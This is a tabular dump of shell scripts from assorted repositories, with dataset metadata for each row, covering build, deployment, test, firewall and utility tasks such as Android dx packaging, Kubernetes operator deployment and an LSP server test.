blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
e0423921e34e90c1be81c4ba0059de2f53a11a46 | Shell | linuxdroid/mininix-packages | /packages/dx/build.sh | UTF-8 | 1,346 | 3.375 | 3 | [
"Apache-2.0"
] | permissive | MININIX_PKG_HOMEPAGE=http://developer.android.com/tools/help/index.html
MININIX_PKG_DESCRIPTION="Command which takes in class files and reformulates them for usage on Android"
MININIX_PKG_VERSION=$MININIX_ANDROID_BUILD_TOOLS_VERSION
MININIX_PKG_PLATFORM_INDEPENDENT=true
mininix_step_make_install () {
# Rewrite packages to avoid using com.android.* classes which may clash with
# classes in the Android runtime on devices (see #1801):
local JARJAR=$MININIX_PKG_CACHEDIR/jarjar.jar
local RULEFILE=$MININIX_PKG_TMPDIR/jarjar-rule.txt
local REWRITTEN_DX=$MININIX_PKG_TMPDIR/dx-rewritten.jar
mininix_download \
http://central.maven.org/maven2/com/googlecode/jarjar/jarjar/1.3/jarjar-1.3.jar \
$JARJAR \
4225c8ee1bf3079c4b07c76fe03c3e28809a22204db6249c9417efa4f804b3a7
echo 'rule com.android.** dx.@1' > $RULEFILE
java -jar $JARJAR process $RULEFILE \
$ANDROID_HOME/build-tools/${MININIX_PKG_VERSION}/lib/dx.jar \
$REWRITTEN_DX
# Dex the rewritten jar file:
mkdir -p $MININIX_PREFIX/share/dex
$MININIX_D8 \
--release \
--min-api 21 \
--output $MININIX_PKG_TMPDIR \
$REWRITTEN_DX
cd $MININIX_PKG_TMPDIR
jar cf dx.jar classes.dex
mv dx.jar $MININIX_PREFIX/share/dex/dx.jar
install $MININIX_PKG_BUILDER_DIR/dx $MININIX_PREFIX/bin/dx
perl -p -i -e "s%\@MININIX_PREFIX\@%${MININIX_PREFIX}%g" $MININIX_PREFIX/bin/dx
}
| true |
6175b882e50abbab2e69e06f9cd16712598933dd | Shell | zer0warm/personal-scripts | /diary | UTF-8 | 1,851 | 4.0625 | 4 | [] | no_license | #!/bin/bash
# Manage diaries
. j4tools
DIARY_PATH="$HOME/j4k1ro-stuff/diary"
DIARY_EDITOR="/Applications/MacVim.app/Contents/bin/vim"
DIARY_USAGE="Usage: $(basename $0) [--path] [on <ddmmyy> | latest | list]"
# Go to diary "warehouse" for easier interactions
mkdir -p $DIARY_PATH && cd $DIARY_PATH
DIARY_DATE=
PATH_FLAG=
SUBJ_FLAG=
if [[ -z "$*" ]]; then
DIARY_DATE="$(date +%d%m%y)"
else
while true; do
case $1 in
on)
[[ $2 =~ ^[0-9]{6}$ ]] && DIARY_DATE=$2 \
|| j4e "$DIARY_USAGE" 1
break
;;
latest)
DIARY_DATE=`ls -t *.dry | head -1 | grep -o '[0-9]\+'`
break
;;
list|-l)
if [[ -n $SUBJ_FLAG ]]; then
SUBJ_FLAG=1
fi
ls -t *.dry
j4e "\nTotal: $(ls *.dry | wc -l | bc) diaries." 0
;;
--path)
PATH_FLAG=1
shift
;;
--with-subjects)
SUBJ_FLAG=1
shift
;;
help|-h)
j4e "$DIARY_USAGE" 0
;;
*)
j4e "$DIARY_USAGE" 1
;;
esac
done
fi
DIARY_NAME="note$DIARY_DATE.dry"
# If file exists, we are modifying its content
[[ -f "$DIARY_NAME" ]] && MOD_FLAG=1
# If file exists and --path was issued, print path to file and exit.
[[ -n $MOD_FLAG && -n $PATH_FLAG ]] && j4e "$DIARY_PATH/$DIARY_NAME" 0
if [[ -n $PATH_FLAG ]]; then
[[ -n $MOD_FLAG ]] && j4e "$DIARY_PATH/$DIARY_NAME" 0 \
|| j4e "$(basename $0): No context for --path"
fi
# Open the diary file
$DIARY_EDITOR $DIARY_NAME
if [[ -f "$DIARY_NAME" ]]; then
# Compare Unix timestamp of the file last modified and current time
if [[ "$(date -r $DIARY_NAME +%s)" != "$(date +%s)" ]]; then
j4po "No new changes recorded for diary <$DIARY_NAME>.\n"
elif [[ ! -z $MOD_FLAG ]]; then
j4po "Diary <$DIARY_NAME> had just been updated.\n"
else
j4po "Diary <$DIARY_NAME> had just been added.\n"
fi
else
j4po "Diary <$DIARY_NAME> discarded. No new file added.\n"
fi
# Get back to where we were at
cd $OLDPWD
| true |
5662464dc016d7d88adaf6abeb5dc5b52a5b40bb | Shell | ghl2009/test_others | /iptables+9207.sh | UTF-8 | 484 | 3.40625 | 3 | [] | no_license | #!/bin/bash
iptables_conf='/etc/sysconfig/iptables'
grep_9207=`grep 'dport 9207' $iptables_conf`
if [[ $grep_9207 ]];then
echo "Iptables has 9207 ports"
exit
else
echo $iptables_conf
rownum=`grep -n 'dport 9311' $iptables_conf|awk -F ':' '{print $1}'`
echo $rownum
ACCEPT_9207=`grep 'dport 9311' $iptables_conf|sed 's/9311/9207/'`
echo $ACCEPT_9207
sed -i "${rownum}a ${ACCEPT_9207}" $iptables_conf
service iptables restart
echo 'Iptables added 9207 ports successfully'
fi
| true |
c29aee08085f9db5b679d269272025e3471f435d | Shell | dualbus/bashly | /tests/cmdline.bashly/001-test-cmdline-arguments-short | UTF-8 | 841 | 3.109375 | 3 | [
"BSD-2-Clause"
] | permissive | #!/bin/bash
: load cmdline
function r {
typeset shift result
shift=$("$@" 3>/dev/null)
result=$("$@" 3>&1 >/dev/null | od -t x1 -An -v | tr -d '[:space:]')
printf '%u:%s' "$shift" "$result"
}
function test {
typeset -A short_map
typeset -A arguments_map
short_map=(['x']=x) arguments_map=(['x']=1)
[[ $(r cmdline__p__arguments__short -x a) = '1:78206100' ]] || return 1
: 'missing arguments'
short_map=(['x']=x) arguments_map=(['x']=2)
cmdline__p__arguments__short -x a >/dev/null 3>&1
(($? == 4)) || return 1
: 'unspecified option'
short_map=() arguments_map=()
cmdline__p__arguments__short -x a >/dev/null 3>&1
(($? == 3)) || return 1
: 'unspecified option (which)'
short_map=() arguments_map=()
[[ $(r cmdline__p__arguments__short -x a) = '0:2d202d7800' ]] || return 1
return 0
}
test
| true |
4da14266b7eec4f670974481513ec00d2ce0210c | Shell | IPv4v6/burp-suite-stuff | /scripts/download-burp-community.sh | UTF-8 | 336 | 3.1875 | 3 | [] | no_license | #!/usr/bin/env bash
set -e
set -u
VERSION="2023.7"
FILE="burpsuite_community_linux_v${VERSION}.sh"
SHA256="5cbe3a46e0de3f228eca89943c7f98258034f42be2dbe3ee98b26116de9f1e57"
curl -R -o ${FILE} \
"https://portswigger.net/burp/releases/download?product=community&version=${VERSION}&type=linux"
echo "${SHA256} ${FILE}" | sha256sum -c -
| true |
4b10cbae4bba498833e2b25c6d7bdfef42472a40 | Shell | Todai88/bth_linux | /kmom03/script/if_1.bash | UTF-8 | 109 | 3.078125 | 3 | [] | no_license | #!/bin/bash
if (($1 > 5));
then
echo "$1 is greater than 5";
else
echo "$1 is NOT greater than 5";
fi;
| true |
ce80d38c9a6092e06b75bb270dab66bac30ff35c | Shell | Jiangkm3/dotfile | /.config/polybar/ibus_show.sh | UTF-8 | 202 | 2.546875 | 3 | [] | no_license | #!/bin/bash
IM=$(ibus engine)
if [[ $IM =~ eng$ ]]; then
echo EN
exit 0
elif [[ $IM =~ pinyin$ ]]; then
echo ZH
exit 0
elif [[ $IM =~ ger$ ]]; then
echo DE
exit 0
fi
echo N/A
exit -1
| true |
35560aa689464bde6933958b454616632ad084cd | Shell | dmalyuta/config-public | /.local/bin/whatsapp-web | UTF-8 | 232 | 2.953125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
if (($# > 0)); then
whatsapp_web_url="$(sed -E 's|whatsapp://|https://web.whatsapp.com/|' <<< "$1")"
exec google-chrome-home "${whatsapp_web_url}"
fi
exec google-chrome-home --app='https://web.whatsapp.com/'
| true |
cc90c7f1431845e4538ec7021a5b709e81c8e381 | Shell | TerryGuo/wasmjit-perf | /compile.bash | UTF-8 | 245 | 2.625 | 3 | [
"MIT"
] | permissive | sudo apt install g++
srcfile=$1
dir=$2
[[ "$srcfile" == "" ]] && srcfile="eosvm_jit.cpp"
[[ "$dir" == "" ]] && dir=$(pwd) || dir=$(pwd)/$2
outputfile=${dir}/${srcfile%.*}
g++ $srcfile -I eos-vm/include/ -std=gnu++17 -lpthread -o $outputfile -O3
| true |
7f20d2f2f16f6a3888e1ff8769991ecbacaf562a | Shell | dmap-group/resources | /scripts/codmap/distributed/planner1/plan.sh | UTF-8 | 1,787 | 3.140625 | 3 | [] | no_license | #!/bin/bash
# This script acts as an unified running interface of your planner process (all planners will have
# similar script). During the competition this script will be used by our infrastructure to run your
# planner. In this testing environment, the run.sh script in your team's home dir calls this plan.sh
# scripts distributively to demonstrate running of your planner.
#
# parameters: plan.sh <domain-file> <problem-file> <agent-name> <agent-ip-file> <output-file>
# example: ./plan.sh ../benchmarks/factored/driverlog/pfile1/domain-driver1.pddl \
# ../benchmarks/factored/driverlog/pfile1/problem-driver1.pddl \
# driver1 ../agent-ip.list ../plan.out
#
# <domain-file>: file name of the domain the planner should be run for
#
# <problem-file>: file name of the problem in the domain <domain-file> the planner should plan with
#
# <agent-name>: name of the agent this planning process plans for
#
# <agent-ip-file>: file name of the list of agents and their IP adresses
#
# <output-file>: file the planner should write the resuting plan in
#
# Note: If your planner needs to run some other service(s) before, this is the right place to do it
# (e.g., message brokers, etc.). The running time is computed including this script. If you need to
# run the additional service only once for one planning problem, you has to check if this is the IP
# address of the primary process. The distributed planners are allowed to use only the factored
# benchmarks in ../benchmarks/factored (the unfactored version is only for use by ma-to-pddl.py).
# See more information in the CoDMAP rules at http://agents.fel.cvut.cz/codmap/.
# *************** REPLACE BY CODE RUNNING YOUR PLANNER ***************
./mockup-dist-planner $1 $2 $3 $4 $5
| true |
f7b4bc88a15f54161a480b7f404f907a6e1054d8 | Shell | sandance/k8s-crds | /website-operator-sdk/deploy-operator.sh | UTF-8 | 1,430 | 4.03125 | 4 | [] | no_license | #!/usr/bin/env bash
deleteAndCreate=true
runLocal=false
operatorName="website-operator"
namespace="default"
image=architechbootcamp/website-operator:1.0.0
function log {
echo "deploy-operator.sh --> $*"
}
function usage {
log "To build, push, and deploy the operator to a cluster: ./deploy-operator.sh"
log "To build, push, run operator locally: ./deploy-operator.sh -l"
}
while getopts ":l:" opt; do
case $opt in
l)
runLocal=true
log "will run operator locally"
;;
\?) #invalid option
log "${OPTARG} is not a valid option"
usage
exit 1
;;
esac
done
if [ -z "$image" ] ; then log "docker image must be provided"; exit 1; fi
log "building the operator with image tag ${image}"
operator-sdk build "$image"
log "pushing operator image ${image}"
docker push "$image"
if [ "$deleteAndCreate" = true ]; then
log "deleting the existing CRD"
kubectl delete -f ./deploy/crds/example_v1beta1_website_crd.yaml
fi
log "creating Website CRD"
kubectl create -f ./deploy/crds/example_v1beta1_website_crd.yaml
if [ "$runLocal" = true ]; then
log "running operator locally"
export OPERATOR_NAME="$operatorName"
operator-sdk up local --namespace "$default"
else
log "deploying operator to the cluster"
kubectl delete -f ./deploy/operator.yaml
kubectl create -f ./deploy/operator.yaml
fi | true |
22cbee71d8fa7506ff2891f93dac54f700414b59 | Shell | pcingola/SnpEff | /scripts_build/pdbCompoundLines.sh | UTF-8 | 177 | 3.046875 | 3 | [
"MIT"
] | permissive | #!/bin/sh -e
dir=$1
scripts=`dirname $0`
for pdb in `find $dir -iname "*.ent.gz"`
do
pdbId=`basename $pdb .ent.gz`
gunzip -c $pdb | $scripts/pdbCompoundLines.py $pdbId
done
| true |
b1a5c6760ca43ac507581dc9914033f82aea09c8 | Shell | gpascualg/ScientificDocker | /scripts/delete_user.sh | UTF-8 | 860 | 4.03125 | 4 | [
"MIT"
] | permissive | #!/bin/bash
RUNPATH=$(realpath $(dirname "$0")/..)
. $RUNPATH/scripts/utils.sh
# handle non-option arguments
if [[ $# -ne 1 ]]; then
echo "$0: A name is required."
exit 1
fi
USERNAME=$1
USERFILE=$RUNPATH/run_files/run_$USERNAME.sh
if [ ! -f $USERFILE ]
then
echo "This user does not exist"
exit 2
fi
if ! docker stats --no-stream &>/dev/null
then
echo "User does not have permission to run docker, please use sudo"
exit 3
fi
negconfirm && exit 4
rm -f $USERFILE
rm -f $RUNPATH/ssh_keys/$USERNAME
rm -f $RUNPATH/ssh_keys/$USERNAME.pub
if docker stop $USERNAME &>/dev/null
then
echo "Docker stopped"
else
echo "Could not stop docker, maybe it was not running at all?"
fi
if docker rm $USERNAME &>/dev/null
then
echo "Docker removed"
else
echo "Could not remove docker, maybe it was never started?"
fi
echo "Done"
| true |
6eb4f65a0681d4bcea7fb4b7dbbd74289e77bdb5 | Shell | chanmingkin72/Node.js-FromTheBeginning | /rest/system/wspd_cgi.sh | UTF-8 | 2,980 | 3.671875 | 4 | [] | no_license | #!/bin/sh
#/**************************************************************/
#/* Copyright (c) 1997 by Progress Software Corporation */
#/* */
#/* All rights reserved. No part of this program or document */
#/* may be reproduced in any form or by any means without */
#/* permission in writing from Progress Software Corporation. */
#/**************************************************************/
#
# WebSpeed CGI Messenger startup script - UNIX Version
# This is a sample of the CGI-based WebSpeed Messenger
# (cgiip) startup script for UNIX. The two environment
# variables: DLC, PROMSGS must be defined for cgiip to
# operate properly. Normally, this shell script
# would reside in the Web Server's scripts directory (e.g. cgi-bin)
# and would be specified in a URL, for example:
# http://hostName/cgi-bin/wspd_cgi.sh/web/src/examples/runscrpt.w
#
# The cgiip executable can be started in a number of ways:
#
# 1. cgiip <host_name> <port_number>
# where: host_name/port_number is the location of a WebSpeed
# Broker or Dispatcher service, this is WebSpeed v1.0
# compatibility.
#
# 2. cgiip -i <WS_service>
# where: WS_service is a WebSpeed Broker or Dispatcher service
# as defined in the WebSpeed property file
# $DLC/ubroker.properties
#
# 3. cgiip
# Started with no arguments. This instructs cgiip to use
# the default service (defaultService) as defined in the
# WebSpeed property file $DLC/ubroker.properties
#
# 4. cgiip -f <properties file>
# Started with a specific property file, this overrides the
# default property file ($DLC/ubroker.properties). If
# -i <WS_service> is specified that service name in
# the <properties file> will be used. If -i <WS_service>
# is not specified then the default service
# (defaultService) must be set in <properties files>.
#
# Determine the correct directory where the Messenger
# is installed from either the tailored name or existing value of $DLC.
for what_dlc in "$DLC" "/usr/dlc"
do
[ ! -f "${what_dlc}/bin/cgiip" ] && continue
DLC=$what_dlc
export DLC
break
done
# Set PROMSGS (if not set)
PROMSGS=${PROMSGS-$DLC/promsgs}; export PROMSGS
# Set the user working directory - this is a tailored value
WRKDIR=${WRKDIR-"/usr/wrk"}; export WRKDIR
# option 1 using host_name and port_num
# $DLC/bin/cgiip pegasus 5001
# option 2 using a service name defined in $DLC/ubroker.properties
$DLC/bin/cgiip -i wsbroker1
# option 3 the "defaultService" defined in $DLC/ubroker.properties
# $DLC/bin/cgiip
# option 4 using a specific properties file name
# $DLC/bin/cgiip -i wsbroker1 -f ./mybroker.properties
# option 5 using a specific properties file name with the "defaultService"
# $DLC/bin/cgiip -f ./mybroker.properties
| true |
3dd8ba2a6772d855be61801799e228d7e89ca9dc | Shell | viin-hub/NCCTSegmentation | /dcm2nii.sh | UTF-8 | 611 | 2.84375 | 3 | [] | no_license | #!/bin/bash
while IFS='\n' read -r s
do
# echo $s
fn0=$(basename "$s")
# echo $fn0
part1=$(dirname "$s")
part2=$(dirname "$part1")
fn1=$(basename "$part1")
# echo $fn1
part3=$(dirname "$part2")
fn2=$(basename "$part2")
# echo $fn2
targetDir="/home/miranda/Documents/data/INSPIRE/subtype/V7.1"
# echo ${targetDir}/$fn2/$fn1/$fn0
mkdir -p ${targetDir}/$fn2/$fn1/$fn0
niftidir=${targetDir}/$fn2/$fn1/$fn0
cd "$s"
/home/miranda/Downloads/MRIcroGL_linux/MRIcroGL/Resources/dcm2niix -o $niftidir -f %p_%s -g y "$s"
done < /home/miranda/Documents/data/INSPIRE/subtype/subtype_INSPIRE_dcm_folders.csv | true |
9ab366288796ea060484c7a7a0bd1312017ec658 | Shell | cerobit/shared | /bash/dot_prompt | UTF-8 | 1,357 | 3.375 | 3 | [] | no_license | declare -r MAX_PATH_LENGTH=40
declare -r GIT_PS1_SHOWDIRTYSTATE=true
declare -r COLOR_PATH="\[\e[34;1m\]"
declare -r COLOR_EXTRAS="\[\e[35m\]"
declare -r COLOR_USER=""
declare -r COLOR_ROOT="\[\e[1;31;40m\]"
declare -r COLOR_HOST=""
declare -r COLOR_RESET="\[\e[0m\]"
function prompt_path {
local path="$1"
local prefix
[[ "$path" =~ (~) ]] && prefix="~/"
if (( ${#path} > $MAX_PATH_LENGTH )); then
path=${path: -$(($MAX_PATH_LENGTH - ${#prefix}))}
[[ "$path" =~ ^[^/]*/(.*) ]] && path="$prefix(...)${BASH_REMATCH[1]}"
fi
echo $path
}
function prompt_git {
[[ $(type -t __git_ps1) ]] || return
local branch="$(__git_ps1 '%s')"
if [[ ! -z "$branch" ]]; then
echo " [$branch]"
fi
}
function prompt_rvm {
[[ -f ~/.rvm/bin/rvm-prompt ]] || return
echo " [$(~/.rvm/bin/rvm-prompt i v g s)]"
}
function prompt_jobs {
local num_jobs=$1
local jobs_str
case $num_jobs in
(0) return ;;
(1) jobs_str="job";;
(*) jobs_str="jobs";;
esac
echo " [$num_jobs $jobs_str]"
}
declare color_by_id
case $EUID in
(0) color_by_id=$COLOR_ROOT ;;
(*) color_by_id=$COLOR_USER ;;
esac
PS1="$COLOR_RESET( $color_by_id\u$COLOR_RESET@$COLOR_HOST\h$COLOR_RESET:$COLOR_PATH\$(prompt_path '\w')$COLOR_RESET$COLOR_EXTRAS\$(prompt_rvm)\$(prompt_git)\$(prompt_jobs \j)$COLOR_RESET )\n\$ "
# vim: set filetype=sh :
| true |
15438cd7d8b816dc2253706859b74b0ad8186cc9 | Shell | snsokolov/verible | /verilog/tools/ls/verible-verilog-ls_test.sh | UTF-8 | 8,751 | 3.03125 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
# Copyright 2021 The Verible Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -u
[[ "$#" == 2 ]] || {
echo "Expecting 2 positional arguments: lsp-server json-rpc-expect"
exit 1
}
LSP_SERVER="$(rlocation ${TEST_WORKSPACE}/$1)"
JSON_RPC_EXPECT="$(rlocation ${TEST_WORKSPACE}/$2)"
TMP_IN=${TEST_TMPDIR:-/tmp/}/test-lsp-in.txt
JSON_EXPECTED=${TEST_TMPDIR:-/tmp/}/test-lsp-json-expect.txt
MSG_OUT=${TEST_TMPDIR:-/tmp/}/test-lsp-out-msg.txt
# One message per line, converted by the awk script to header/body.
# Starting up server, sending two files, a file with a parse error and
# a file that parses, but has a EOF newline linting diagnostic.
#
# We get the diagnostic messages for both of these files, one reporting
# a syntax error, one reporting a lint error.
#
# We then modify the second file and edit the needed newline at the end of
# the buffer, and then get an update with zero diagnostic errors back.
#
# TODO: maybe this awk-script should be replaced with something that allows
# multi-line input with comment.
awk '/^{/ { printf("Content-Length: %d\r\n\r\n%s", length($0), $0)}' > ${TMP_IN} <<EOF
{"jsonrpc":"2.0", "id":1, "method":"initialize","params":null}
# Testing a file with syntax errors: this should output some diagnostic
{"jsonrpc":"2.0","method":"textDocument/didOpen","params":{"textDocument":{"uri":"file://syntaxerror.sv","text":"brokenfile\n"}}}
# Let's manually request these diagnostics
{"jsonrpc":"2.0", "id":2, "method":"textDocument/diagnostic","params":{"textDocument":{"uri":"file://syntaxerror.sv"}}}
# A file with a lint error (no newline at EOF). Then editing it and watching diagnostic go away.
{"jsonrpc":"2.0","method":"textDocument/didOpen","params":{"textDocument":{"uri":"file://mini.sv","text":"module mini();\nendmodule"}}}
# Requesting a code-action exactly at the position the EOF message is reported.
# This is an interesting special case, as the missing EOF-newline is an empty
# range, yet it should be detected as overlapping with that diagnostic message.
{"jsonrpc":"2.0", "id":10, "method":"textDocument/codeAction","params":{"textDocument":{"uri":"file://mini.sv"},"range":{"start":{"line":1,"character":9},"end":{"line":1,"character":9}}}}
{"jsonrpc":"2.0","method":"textDocument/didChange","params":{"textDocument":{"uri":"file://mini.sv"},"contentChanges":[{"range":{"start":{"character":9,"line":1},"end":{"character":9,"line":1}},"text":"\n"}]}}
{"jsonrpc":"2.0", "id":11, "method":"textDocument/documentSymbol","params":{"textDocument":{"uri":"file://mini.sv"}}}
{"jsonrpc":"2.0","method":"textDocument/didClose","params":{"textDocument":{"uri":"file://mini.sv"}}}
# Attempt to query closed file should gracefully return an empty response.
{"jsonrpc":"2.0", "id":12, "method":"textDocument/documentSymbol","params":{"textDocument":{"uri":"file://mini.sv"}}}
# Highlight, but only symbols not highlighting 'assign' non-symbol.
{"jsonrpc":"2.0","method":"textDocument/didOpen","params":{"textDocument":{"uri":"file://sym.sv","text":"module sym();\nassign a=1;assign b=a+1;endmodule\n"}}}
{"jsonrpc":"2.0", "id":20, "method":"textDocument/documentHighlight","params":{"textDocument":{"uri":"file://sym.sv"},"position":{"line":1,"character":7}}}
{"jsonrpc":"2.0", "id":21, "method":"textDocument/documentHighlight","params":{"textDocument":{"uri":"file://sym.sv"},"position":{"line":1,"character":2}}}
# Formatting a file
{"jsonrpc":"2.0","method":"textDocument/didOpen","params":{"textDocument":{"uri":"file://fmt.sv","text":"module fmt();\nassign a=1;\nassign b=2;endmodule\n"}}}
{"jsonrpc":"2.0", "id":30, "method":"textDocument/rangeFormatting","params":{"textDocument":{"uri":"file://fmt.sv"},"range":{"start":{"line":1,"character":0},"end":{"line":2,"character":0}}}}
{"jsonrpc":"2.0", "id":31, "method":"textDocument/rangeFormatting","params":{"textDocument":{"uri":"file://fmt.sv"},"range":{"start":{"line":1,"character":0},"end":{"line":1,"character":1}}}}
{"jsonrpc":"2.0", "id":32, "method":"textDocument/rangeFormatting","params":{"textDocument":{"uri":"file://fmt.sv"},"range":{"start":{"line":2,"character":0},"end":{"line":2,"character":1}}}}
{"jsonrpc":"2.0", "id":33, "method":"textDocument/rangeFormatting","params":{"textDocument":{"uri":"file://fmt.sv"},"range":{"start":{"line":1,"character":0},"end":{"line":3,"character":0}}}}
{"jsonrpc":"2.0", "id":34, "method":"textDocument/formatting","params":{"textDocument":{"uri":"file://fmt.sv"}}}
{"jsonrpc":"2.0", "id":100, "method":"shutdown","params":{}}
EOF
# TODO: change json rpc expect to allow comments in the input.
cat > "${JSON_EXPECTED}" <<EOF
[
{
"json_contains": {
"id":1,
"result": {
"serverInfo": {"name" : "Verible Verilog language server."}
}
}
},
{
"json_contains": {
"method":"textDocument/publishDiagnostics",
"params": {
"uri": "file://syntaxerror.sv",
"diagnostics":[{"message":"syntax error"}]
}
}
},
{
"json_contains": {
"id":2,
"result": {
"kind":"full",
"items":[{"message":"syntax error"}]
}
}
},
{
"json_contains": {
"method":"textDocument/publishDiagnostics",
"params": {
"uri": "file://mini.sv",
"diagnostics":[{"message":"File must end with a newline.","range":{"start":{"line":1,"character":9}}}]
}
}
},
{
"json_contains": {
"id":10,
"result": [
{"edit": {"changes": {"file://mini.sv":[{"newText":"\n"}]}}}
]
}
},
{
"json_contains": {
"method":"textDocument/publishDiagnostics",
"params": {
"uri": "file://mini.sv",
"diagnostics":[]
}
}
},
{
"json_contains": {
"id":11,
"result": [
{"kind":6, "name":"mini"}
]
}
},
{
"json_contains":{
"id":12 ,
"result": []
}
},
{
"json_contains": {
"method":"textDocument/publishDiagnostics",
"params": {
"uri": "file://sym.sv",
"diagnostics":[]
}
}
},
{
"json_contains":{
"id":20,
"result": [
{"range":{"start":{"line":1, "character": 7}, "end":{"line":1, "character": 8}}},
{"range":{"start":{"line":1, "character":20}, "end":{"line":1, "character":21}}}
]
}
},
{
"json_contains":{
"id":21,
"result": []
}
},
{
"json_contains": {
"method":"textDocument/publishDiagnostics",
"params": {
"uri": "file://fmt.sv",
"diagnostics":[]
}
}
},
{
"json_contains":{
"id":30,
"result": [
{"newText":" assign a=1;\n","range":{"end":{"character":0,"line":2},"start":{"character":0,"line":1}}}
]
}
},
{
"json_contains":{
"id":31,
"result": [
{"newText":" assign a=1;\n","range":{"end":{"character":0,"line":2},"start":{"character":0,"line":1}}}
]
}
},
{
"json_contains":{
"id":32,
"result": [
{"newText":" assign b=2;\nendmodule\n","range":{"end":{"character":0,"line":3},"start":{"character":0,"line":2}}}
]
}
},
{
"json_contains":{
"id":33,
"result": [
{"newText":" assign a = 1;\n assign b = 2;\nendmodule\n","range":{"end":{"character":0,"line":3},"start":{"character":0,"line":1}}}
]
}
},
{
"json_contains":{
"id":34,
"result": [{
"newText": "module fmt ();\n assign a = 1;\n assign b = 2;\nendmodule\n",
"range": {"end":{"character":0,"line":3},"start":{"character":0,"line":0}}
}]
}
},
{
"json_contains": { "id":100 }
}
]
EOF
"${LSP_SERVER}" < ${TMP_IN} 2> "${MSG_OUT}" \
| ${JSON_RPC_EXPECT} ${JSON_EXPECTED}
JSON_RPC_EXIT=$?
echo "-- stderr messages --"
cat ${MSG_OUT}
if [ $JSON_RPC_EXIT -ne 0 ]; then
# json-rpc-expect outputs the entry, where the mismatch occured, in exit code
echo "Exit code of json rpc expect; first error at $JSON_RPC_EXIT"
exit 1
fi
grep "shutdown request" "${MSG_OUT}" > /dev/null
if [ $? -ne 0 ]; then
echo "Didn't get shutdown feedback"
exit 1
fi
| true |
acec7b56cf7361f01296518445089b2c0ec741d5 | Shell | Torqu3Wr3nch/docker-esetAV | /root/etc/services.d/directoryMonitor/run | UTF-8 | 2,852 | 3.578125 | 4 | [] | no_license | #!/bin/bash
accessLog=/tmp/esetAV/accessLog
scanInProgressLog=/tmp/esetAV/scanInProgress
inotifywait -m -e CLOSE_WRITE -r --timefmt "%F %T" --format "%T %w" /mnt/monitor \
| while read ENTRY
do
FILEDIRECTORY=$(echo "$ENTRY" | sed 's/[0-9]\{4\}\-[0-9]\{2\}\-[0-9]\{2\}\s[0-9]\{2\}\:[0-9]\{2\}\:[0-9]\{2\}\s//')
# Check if directory is being scanned (including if its superdirectory about to be scanned)
if [[ -z $(awk -v dir="$FILEDIRECTORY" '$0 == substr(dir, 1, length($0))' $scanInProgressLog) ]]; then
# If directory already in the accessLog (or if itself is a superdirectory of a directory that's already in the accessLog), update time stamp.
if grep -q -F "$FILEDIRECTORY" $accessLog; then
FILEDIRECTORY=$(echo "$FILEDIRECTORY" | sed -e 's/[]\/$*.^[]/\\&/g')
ENTRY=$(echo "$ENTRY" | sed -e 's/[\/&]/\\&/g')
flock -s $accessLog -c "sed -i \"s/.*$FILEDIRECTORY.*/$ENTRY/g\" $accessLog; sort -u $accessLog -o $accessLog" # If we update a bunch of directories to their superdirectory, merge the matches with sort.
else
# If entry is a subdirectory of a directory already on the accessLog, simply update the time stamp.
parentDirectoryLine=$(awk -v dir="$FILEDIRECTORY" 'substr($0,21) == substr(dir, 1, length($0)-20)' $accessLog)
if [[ -n $parentDirectoryLine ]]; then
entryTimeStamp=$(echo "$ENTRY" | sed 's/\s\/.*//')
directory=$(echo "$parentDirectoryLine" | sed 's/[0-9]\{4\}\-[0-9]\{2\}\-[0-9]\{2\}\s[0-9]\{2\}\:[0-9]\{2\}\:[0-9]\{2\}\s//')
replacementEntry=$entryTimeStamp" "$directory
parentDirectoryLine=$(echo "$parentDirectoryLine" | sed -e 's/[]\/$*.^[]/\\&/g')
replacementEntry=$(echo "$replacementEntry" | sed -e 's/[\/&]/\\&/g')
flock -s $accessLog -c "sed -i \"s/$parentDirectoryLine/$replacementEntry/g\" $accessLog"
# If we make it this far, we have no record of this directory, add it to the list.
else
flock -s $accessLog -c "echo \"$ENTRY\" >> $accessLog"
fi
fi
fi
done | true |
3fcfb1479355b2052752dbb2aa98212683f65843 | Shell | esproul/nad | /plugins/cassandra/cassandra_po.sh | UTF-8 | 658 | 3.390625 | 3 | [] | no_license | #!/bin/bash
source /opt/circonus/etc/cass-po-conf.sh
# default location
po=/opt/circonus/bin/protocol_observer
if [[ ! -x $po ]]; then
po=`type -P protocol_observer`
[[ $? -eq 0 ]] || { echo 'Unable to location protocol_observer binary'; exit 1; }
fi
IFACE="${IFACE:="auto"}"
NADURL="${NADURL:="http://localhost:2609"}"
NADURL=${NADURL%/}
# if protocol_observer is already running, exit
popid=$(pgrep -n -f 'protocol_observer -wire cassandra_cql')
if [[ -n "$popid" ]]; then
echo "already running with pid $popid"
exit 0
fi
sudo $po -wire cassandra_cql -submissionurl ${NADURL}/write/cassandra_protocol_observer &
| true |
2c871d14bbe356024217b44783b2b095c6e2e6fb | Shell | zarelaky/android-offline-docs-utils | /replace_ytblogger_lists_unified_js.sh | UTF-8 | 228 | 2.859375 | 3 | [
"Apache-2.0"
] | permissive |
target=ytblogger_lists_unified.js
grep -r $target|awk -F\: '{ print $1; }' > .l
for i in `cat .l`;
do
case i in
$target)
continue;;
esac
sed -i "s#<script.*$target.*</script>##g" $i;
done
rm .l
| true |
880ff190c87802a4c17a4efbc4737472cf3118da | Shell | lx668/shell | /tomcat-js-deploy/web-autopublish.sh | UTF-8 | 1,115 | 2.59375 | 3 | [] | no_license | #!/bin/bash
WAR_PATH="/data/www/war"
SITE_PATH="/data/www/site"
TOMCAT_PATH="/data/services/apache-tomcat-8.5.4/"
PROJECT_NAME="bi-web"
cd /data/code/chaos
git pull
mvn clean install -Pprod -Dmaven.test.skip=true
cd $PROJECT_NAME/
mvn clean install -Pprod -Dmaven.test.skip=true
